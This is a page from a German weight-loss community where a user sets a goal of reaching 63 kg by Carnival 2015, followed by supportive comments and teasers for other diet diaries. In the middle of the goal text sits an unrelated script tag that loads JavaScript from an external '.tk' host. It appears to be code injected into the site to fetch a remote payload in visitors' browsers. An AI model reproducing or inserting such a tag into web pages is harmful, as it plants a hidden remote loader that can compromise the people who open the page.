Zum Inhalt springen

Sie sind hier

Bis Karneval 2015 63kg wiegen

0  0
Ein Ziel im persönlichen Abnehmplan von , am geschrieben

Wie auch schon im Tagebuch geschrieben möchte ich bis Karneval die Zahl 63 auf der Waage stehen haben Wink

und in größe 38 rein passen Biggrin

Als Ziel-Datum hab ich jetzt den weiberdonnerstag gewählt Biggrin

<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Datum, bis zu dem das Ziel erreicht sein soll: 
12.02.2015
Ziel-Status: 
Ziel wird aktuell verfolgt

Kommentare

Bild des Benutzers schaina
0  0

dankeschön Smile

es hilft ungemein das ich euch an meiner seite hab Smile

Bild des Benutzers schaina
0  0

auch dir ein dickes dankeschön...

ohne euch würde ich bis jetzt immer noch nicht so weit sein Smile

Nach oben
Zur Hauptnavigation

Persönliche Ziele im AbnehmplanWir bei der Diät-Clique halten nichts davon, Dir einen fertigen Ernährungs- oder Diätplan vorzusetzen, in dem Dir für jeden Tag vorgeschrieben wird, was Du essen sollst. Der Abnehmplan bei der Diät-Clique funktioniert anders - erfahre hier mehr zum Abnehmplan.

Beiträge aus der Abnehmen-Community, die ebenfalls interessant sein könnten

Eintrag in ein Ernährungstagebuch von veilchen: Also gut am wochenende Samstag frühstück chia pudding mittags zwei handvoll mandeln abends veganes kürbis "gulasch" Sonntag frühstück pancakes mit waldbeeren mittags ein halbes stück apfelkuchen...
Eintrag in ein Ernährungstagebuch von Sense8: Montag, 19. Juni 2017 Am Wochenende habe ich kein Ernährungstagebuch geschrieben, weil ich zu lange in der Sonne war und warscheinlich einen kleinen Sonnenstich hatte mit Kopfschmerzen und Übelkeit....
Eintrag in ein Ernährungstagebuch von Wunschgewicht: Mir gings paar Tage nicht so gut, da war das schon ne Herausforderung. Aber ich bin sie gegangen. Vielleicht nicht so flott wie sonst, aber Schritt ist Schritt und davon stehen jeden Tag mindestens...
Ziel für den Abnehmplan von Paradisesucks: Ich möchte unbedingt bis zum Ende des Jahres unter 64 Kg wiegen. Und um das zu erreichen möchte ich auf Süßigkeiten und Fleisch verzichten, gesünder mich ernähren, Abends nichts mehr essen und...
Forenthema von Sonny2: Hallo Ich bin neu in dem Forum und möchte mich kurz vorstellen. Ich bin 44 und wiege derzeit 90 Kilo bei 1,65. Ich möchte es endlich schaffen abzunehmen um mich wieder wohl zu fühlen und hoffe eher...
Motivation von Sense8: Ich habe schöne Hosen und Röcke im Schrank, die mir seit ca. 1,5 Jahren nicht mehr richtig passen, weil ich schlagartig zugenommen habe. Ich möchte die Frustfress-Kilos wieder runter bekommen und in...

Gemeinsam abnehmen

Die Diät-Clique ist eine kostenlose Community rund ums Abnehmen:

Kostenlos abnehmen

Die Diät-Clique ist völlig kostenlos nutzbar. Du kannst